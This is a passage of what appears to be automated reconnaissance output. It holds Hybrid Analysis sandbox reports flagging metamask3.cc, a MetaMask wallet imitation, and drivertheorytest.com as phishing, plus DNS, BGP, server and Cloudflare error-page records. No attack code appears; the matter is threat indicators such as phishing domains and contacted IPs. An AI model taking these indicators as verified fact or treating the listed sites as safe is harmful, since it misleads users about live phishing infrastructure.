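Read the results with the capture in mind: a missing Strict-Transport-Security on a challenge page says nothing about the origin, while the same gap on the cPanel port-2083 response is a finding against that host. Cookies named expired with an epoch expiry are deletions, so the attribute gaps matter most on cpsession, the one live session cookie in the set.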
| 2023-05-12 02:45:46 | Raw Data from RIRs | No | Hybrid Analysis | 2 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://metamask3.cc/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_1e4_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_1e4_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_484"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_1e4_ConnHashTable<484>_HashTable_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_1e4_IESQMMUTEX_0_303"\n "IsoScope_1e4_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_1e4_IE_EarlyTabStart_0xda8_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_484"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"103.60.109.137:80"\n "185.199.111.153:443"\n 
"65.8.165.91:443"\n "58.216.15.119:443"\n "142.251.32.42:80"\n "142.251.46.163:443"\n "142.250.188.3:80"\n "104.16.89.50:443"\n "104.17.210.243:443"\n "104.17.214.243:443"\n "142.250.189.238:443"\n "142.250.188.3:443"\n "142.251.46.194:443"\n "142.251.46.230:443"\n "142.250.189.202:443"\n "172.217.164.118:443"\n "142.250.189.161:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"metamask3.cc"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-3', u'name': u'Tries to GET non-existent files from a webserver', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"GET /fonts/EuclidCircularB-Regular-WebXL.woff HTTP/1.1\nAccept: */*\nReferer: http://metamask3.cc/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: http://metamask3.cc\nAccept-Encoding: gzip, deflate\nHost: metamask3.cc\nDNT: 1\nConnection: Keep-Alive"\n "GET /fonts/EuclidCircularB-Bold-WebXL.woff HTTP/1.1\nAccept: */*\nReferer: http://metamask3.cc/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: http://metamask3.cc\nAccept-Encoding: gzip, deflate\nHost: metamask3.cc\nDNT: 1\nConnection: Keep-Alive"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 
7, u'description': u'"cdn.embedly.com"\n "d3e54v103j8qbb.cloudfront.net"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "forms.hsforms.com"\n "googleads.g.doubleclick.net"\n "i.ytimg.com"\n "jnn-pa.googleapis.com"\n "metamask.io"\n "metamask3.cc"\n "perf.hsforms.com"\n "s4.cnzz.com"\n "static.doubleclick.net"\n "www.gstatic.com"\n "www.youtube.com"\n "yt3.ggpht.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'file/memory contains long string with (Indicator: "dir "; File: "www-widgetapi_1_.js")\n Found string "qk.prototype.remove=function(a){this.g&&this.g.remove(a);var b=this.h;be.remove(""+a,"/",void 0===b?"youtube.com":b)};var rk=function(){var a;return function(){a||(a=new qk("ytidb"));return a}}();" (Indicator: "dir "; File: "www-widgetapi_1_.js")\n Found string ""undefined"!=typeof YTConfig&&YTConfig.parsetags&&"onload"!=YTConfig.parsetags||Fp();var qq=z.onYTReady;qq&&qq();var rq=z.onYouTubeIframeAPIReady;rq&&rq();var sq=z.onYouTubePlayerAPIReady;sq&&sq();}).call(this);" (Indicator: "dir "; File: "www-widgetapi_1_.js")\n Found string "<meta content="MetaMask - A crypto wallet & gateway to blockchain apps" property="twitter:title">" (Indicator: "dir "; File: "5IBMEWA7.htm")\n Found string "<meta content="A crypto wallet & gateway to blockchain apps" property="twitter:description">" (Indicator: "dir "; File: "5IBMEWA7.htm")\n Found string "<meta content="https://uploads-ssl.webflow.com/5b479ea1731aa13135a70342/5e6010110671f79d5c96adf9_open%20graph.png" property="twitter:image">" (Indicator: "dir "; File: "5IBMEWA7.htm")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': 
u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "Explore-illo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "wallet-illo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "Browse-illo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "mm-logo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "mm-close-black_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1FE2.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1FB1.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"hero2.2_1_.png" has type "PNG image data 1752 x 1452 8-bit/color RGBA non-interlaced" and extension "png"\n "mm-shop-hoodie_1_.png" has type "PNG image data 786 x 786 8-bit/color RGBA non-interlaced" and extension "png"\n "maxresdefault_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 baseline precision 8 1280x720 components 3" and extension "jpg"\n "dapp-axieinfinity_1_.png" has type "PNG image data 560 x 560 8-bit/color RGBA non-interlaced" and extension "png"\n "dapp-aave_1_.png" has type "PNG image data 560 x 560 8-bit/color RGBA non-interlaced" and extension "png"\n "dapp-compound_1_.png" has type "Unknown" and extension 
"png"\n "dapp-uniswap_1_.png" has type "Unknown" and extension "png"\n "dapp-gitcoin_1_.png" has type "Unknown" and extension "png"\n "dapp-maker_1_.png" has type "Unknown" and extension "png"\n "dapp-rarible_1_.png" has type "Unknown" and extension "png"\n "dapp-opensea_1_.png" has type "Unknown" and extension "png"\n "unnamed_1_.jpg" has type "Unknown" and extension "jpg"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab1FB0.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab1FB0.tmp]- [targetUID: 00000000-00000852]\n "Cab1FE1.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab1FE1.tmp]- [targetUID: 00000000-00000852]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"Explore-illo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "wallet-illo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "Browse-illo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "mm-logo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "mm-close-black_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "social-35_1_.svg" has type "SVG 
Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "base_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "hero2.2_1_.png" has type "PNG image data 1752 x 1452 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "v2_1_.js" has type "UTF-8 Unicode text with very l | 185.199.111.153 |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 1 | 3 | 0 | None | nginx | {"content-encoding": "gzip", "transfer-encoding": "chunked", "vary": "Accept-Encoding", "server": "nginx", "connection": "keep-alive", "etag": "W/\"64217dc5-156\"", "date": "Fri, 12 May 2023 03:24:22 GMT", "content-type": "text/html"} |
| 2023-05-12 02:44:15 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Cloudflare | nwapi2.battleb0t.xyz |
| 2023-05-12 03:15:35 | Web Content Language | No | Language Detector | 0 | 0 | 3 | 0 | None | English | <!DOCTYPE html>
<!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
<!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
<!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->
<head>
<title>nuke.battleb0t.xyz | 521: Web server is down</title>
<meta charset="UTF-8" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=Edge" />
<meta name="robots" content="noindex, nofollow" />
<meta name="viewport" content="width=device-width,initial-scale=1" />
<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/main.css" />
</head>
<body>
<div id="cf-wrapper">
<div id="cf-error-details" class="p-0">
<header class="mx-auto pt-10 lg:pt-6 lg:px-8 w-240 lg:w-full mb-8">
<h1 class="inline-block sm:block sm:mb-2 font-light text-60 lg:text-4xl text-black-dark leading-tight mr-2">
<span class="inline-block">Web server is down</span>
<span class="code-label">Error code 521</span>
</h1>
<div>
Visit <a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=nuke.battleb0t.xyz" target="_blank" rel="noopener noreferrer">cloudflare.com</a> for more information.
</div>
<div class="mt-3">2023-05-12 02:54:20 UTC</div>
</header>
<div class="my-8 bg-gradient-gray">
<div class="w-240 lg:w-full mx-auto">
<div class="clearfix md:px-8">
<div id="cf-browser-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center">
<div class="relative mb-10 md:m-0">
<span class="cf-icon-browser block md:hidden h-20 bg-center bg-no-repeat"></span>
<span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span>
</div>
<span class="md:block w-full truncate">You</span>
<h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3">
Browser
</h3>
<span class="leading-1.3 text-2xl text-green-success">Working</span>
</div>
<div id="cf-cloudflare-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center">
<div class="relative mb-10 md:m-0">
<a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=nuke.battleb0t.xyz" target="_blank" rel="noopener noreferrer">
<span class="cf-icon-cloud block md:hidden h-20 bg-center bg-no-repeat"></span>
<span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span>
</a>
</div>
<span class="md:block w-full truncate">Newark</span>
<h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3">
<a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=nuke.battleb0t.xyz" target="_blank" rel="noopener noreferrer">
Cloudflare
</a>
</h3>
<span class="leading-1.3 text-2xl text-green-success">Working</span>
</div>
<div id="cf-host-status" class="cf-error-source relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center">
<div class="relative mb-10 md:m-0">
<span class="cf-icon-server block md:hidden h-20 bg-center bg-no-repeat"></span>
<span class="cf-icon-error w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span>
</div>
<span class="md:block w-full truncate">nuke.battleb0t.xyz</span>
<h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3">
Host
</h3>
<span class="leading-1.3 text-2xl text-red-error">Error</span>
</div>
</div>
</div>
</div>
<div class="w-240 lg:w-full mx-auto mb-8 lg:px-8">
<div class="clearfix">
<div class="w-1/2 md:w-full float-left pr-6 md:pb-10 md:pr-0 leading-relaxed">
<h2 class="text-3xl font-normal leading-1.3 mb-4">What happened?</h2>
<p>The web server is not returning a connection. As a result, the web page is not displaying.</p>
</div>
<div class="w-1/2 md:w-full float-left leading-relaxed">
<h2 class="text-3xl font-normal leading-1.3 mb-4">What can I do?</h2>
<h3 class="text-15 font-semibold mb-2">If you are a visitor of this website:</h3>
<p class="mb-6">Please try again in a few minutes.</p>
<h3 class="text-15 font-semibold mb-2">If you are the owner of this website:</h3>
<p><span>Contact your hosting provider letting them know your web server is not responding.</span> <a rel="noopener noreferrer" href="https://support.cloudflare.com/hc/en-us/articles/200171916-Error-521">Additional troubleshooting information</a>.</p>
</div>
</div>
</div>
<div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300">
<p class="text-13">
<span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">7c5f605eb97732c7</strong></span>
<span class="cf-footer-separator sm:hidden">•</span>
<span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1">
Your IP:
<button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button>
<span class="hidden" id="cf-footer-ip">138.197.106.3</span>
<span class="cf-footer-separator sm:hidden">•</span>
</span>
<span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=nuke.battleb0t.xyz" id="brand_link" target="_blank">Cloudflare</a></span>
</p>
<script>(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMContentLoaded",d)})();</script>
</div><!-- /.error-footer -->
</div>
</div>
</body>
</html>
|
| 2023-05-12 02:49:09 | Malicious Co-Hosted Site | Yes | VirusTotal | 0 | 1 | 2 | 0 | None | VirusTotal [github.com]
https://www.virustotal.com/en/domain/github.com/information/ | github.com |
| 2023-05-12 02:53:35 | BGP AS Membership | No | Censys | 0 | 0 | 2 | 0 | None | 54113 | 185.199.110.153 |
| 2023-05-12 02:48:44 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 22, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://www.opentext.com/', u'signatures': [{u'category': u'General', u'origin': u'API Call', u'identifier': u'api-22', u'name': u'Fails to load modules at runtime', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1574/002', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-641', u'attck_id': u'T1574.002', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" failed to load missing module "MDMRegistration.dll" - [base:0; Status:c000000d]\n "msedge.exe" failed to load missing module "netapi32.dll" - [base:0; Status:c000000d]\n "msedge.exe" failed to load missing module "d3d11.dll" - [base:0; Status:c000000d]\n "msedge.exe" failed to load missing module "%WINDIR%\\system32\\hevcdecoder.dll" - [base:0; Status:c0000135]\n "msedge.exe" failed to load missing module "d3d12.dll" - [base:0; Status:c000000d]'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:4204:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:4204:120:WilError_01"\n "InternetShortcutMutex"\n "Local\\SM0:6036:120:WilError_01"\n "Local\\SM0:6036:304:WilStaging_02"\n "SM0:6036:120:WilError_01"\n "Local\\SM0:4204:304:WilStaging_02"\n "SM0:4204:304:WilStaging_02"\n "Local\\SM0:4204:120:WilError_01"\n "SM0:4204:120:WilError_01"\n "ChromeProcessSingletonStartup!"\n 
"\\Sessions\\1\\BaseNamedObjects\\SM0:4204:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:4204:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:443"\n "172.66.40.92:443"\n "35.84.103.227:443"\n "104.19.187.97:443"\n "104.18.43.158:443"\n "104.26.6.30:443"\n "104.16.126.175:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"assets.ot.digital"\n "cdn.cookielaw.org"\n "central.opentext.com"\n "d3js.org"\n "geolocation.onetrust.com"\n "origin.marketinghub.opentext.com"\n "rsms.me"\n "unpkg.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'""sameAs": ["https://twitter.com/OpenText","https://www.youtube.com/user/opentextcorp","https://www.linkedin.com/company/opentext"]" (Indicator: "linkedin.com")\n "ls:begin[meta-twitter]-->" (Indicator: "twitter")\n "<meta name="twitter:url" content="https://www.opentext.com/homepage">" (Indicator: "twitter")\n "<meta name="twitter:title" content="OpenText | Information Management Solutions">" (Indicator: "twitter")\n "ls:end[meta-twitter]-->" (Indicator: "twitter")\n "<meta 
property="twitter:image" content="/assets/images/OT_ShareImage_twitter.png">" (Indicator: "twitter")\n "<li class="list-inline-item"><a class="social-icon social-icon-linkedin" href="https://www.linkedin.com/company/opentext"><svg width="32" height="32" viewBox="0 0 36 36" fill="none" role="img" aria-hidden="true" focusable="false">" (Indicator: "linkedin.com")\n "<li class="list-inline-item"><a class="social-icon social-icon-twitter" href="https://twitter.com/OpenText"><svg width="32" height="32" viewBox="0 0 36 36" fill="none" role="img" aria-hidden="true" focusable="false">" (Indicator: "twitter")\n "<li class="list-inline-item"><a class="social-icon social-icon-youtube" href="https://www.youtube.com/user/opentextcorp"><svg width="32" height="32" viewBox="0 0 36 36" fill="none" role="img" aria-hidden="true" focusable="false">" (Indicator: "youtube")\n "<path fill="currentColor" fill-rule="evenodd" clip-rule="evenodd" d="M27.8 14.1C27.8 14.1 27.604 12.692 27.005 12.072C26.319 11.339 25.559 11.263 25.13 11.221L25 11.207C22.203 11 18.005 11 18.005 11H17.995C17.995 11 13.797 11 10.999 11.207L10.872 11.22C10.442 11.263 9.682 11.338 8.995 12.072C8.395 12.692 8.2 14.101 8.2 14.101C8.2 14.101 8 15.755 8 17.409V18.959C8 20.613 8.2 22.267 8.2 22.267C8.2 22.267 8.395 23.675 8.995 24.295C9.627 24.971 10.421 25.069 10.929 25.131H10.93C11.034 25.144 11.124 25.155 11.2 25.169C12.8 25.326 18 25.375 18 25.375C18 25.375 22.203 25.369 25.001 25.162L25.131 25.148C25.56 25.105 26.32 25.029 27.005 24.295C27.605 23.675 27.8 22.267 27.8 22.267C27.8 22.267 28 20.613 28 18.959V17.409C28 15.755 27.8 14.101 27.8 14.101V14.1ZM15.934 15.096L15.935 20.838L21.338 17.978L15.934 15.096V15.096Z"></path></svg><span class="sr-only">OpenText on Youtube</span></a></li>" (Indicator: "youtube")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-203', u'name': u'Tries to access LNK files (Windows shortcut)', u'attck_id_wiki': 
u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-497', u'attck_id': u'T1083', u'relevance': 3, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" trying to access LNK file "C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\File Explorer.lnk"\n "msedge.exe" trying to access LNK file "C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Microsoft Edge.lnk"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlref_httpswww.opentext.com" has type "HTML document UTF-8 Unicode text with very long lines with CRLF LF line terminators"- [targetUID: N/A]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\DawnCache\\data_2]- [targetUID: 00000000-00004204]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.45\\Ruleset Data]- [targetUID: 00000000-00004204]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%TEMP%\\4204_1570983389\\edge_driver.js]- [targetUID: 00000000-00004204]\n "Filtering Rules" has type "data"- Location: [%TEMP%\\4204_136538697\\Filtering Rules]- [targetUID: 00000000-00004204]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\DawnCache\\data_1]- [targetUID: 00000000-00004204]\n "000009.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000009.log]- [targetUID: 00000000-00004204]\n "000013.ldb" has type "data"- 
[targetUID: N/A]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00004204]\n "8e9b2f83-d856-4edd-b2fc-76a0ecffee8d.tmp" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT) original size modulo 2^32 559302"- Location: [%TEMP%\\8e9b2f83-d856-4edd-b2fc-76a0ecffee8d.tmp]- [targetUID: 00000000-00004204]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sync Data\\LevelDB\\000003.log]- [targetUID: 00000000-00004204]\n "Filtering Rules-AA" has type "data"- Location: [%TEMP%\\4204_136538697\\Filtering Rules-AA]- [targetUID: 00000000-00004204]\n "000014.ldb" has type "data"- [targetUID: N/A]\n "f_0004d6" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_0004d6]- [targetUID: 00000000-00005988]\n "f_0004cb" has type "Web Open Font Format (Version 2) TrueType length 245036 version 1.0"- [targetUID: N/A]\n "f_0004c8" has type "Web Open Font Format (Version 2) TrueType length 227180 version 1.0"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_0004c8]- [targetUID: 00000000-00005988]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-50', u'name': u'Creates a license file', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-497', u'attck_id': u'T1083', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"edge_driver.js.LICENSE.txt" has type "Unknown"- Location: [%TEMP%\\4204_1570983389\\edge_driver.js.LICENSE.txt]- [targetUID: 00000000-00004204]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', 
u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://www.opentext.com/"\n Pattern match: "https://www.opentext.com"\n Heuristic match: "cdn.cookielaw.org"\n Heuristic match: "central.opentext.com"\n Heuristic match: "d3js.org"\n Heuristic match: "geolocation.onetrust.com"\n Heuristic match: "origin.marketinghub.opentext.com"\n Heuristic ma | 185.199.110.153 |
| 2023-05-12 03:41:55 | Affiliate - Domain Name | No | DNS Resolver | 2 | 0 | 5 | 0 | None | inflany.com | mail.inflany.com |
| 2023-05-12 02:50:09 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://drivertheorytest.com/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_f0c_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_f0c_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3852"\n "IsoScope_f0c_IE_EarlyTabStart_0xee4_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_f0c_IESQMMUTEX_0_303"\n "IsoScope_f0c_IESQMMUTEX_0_331"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "UpdatingNewTabPageData"\n 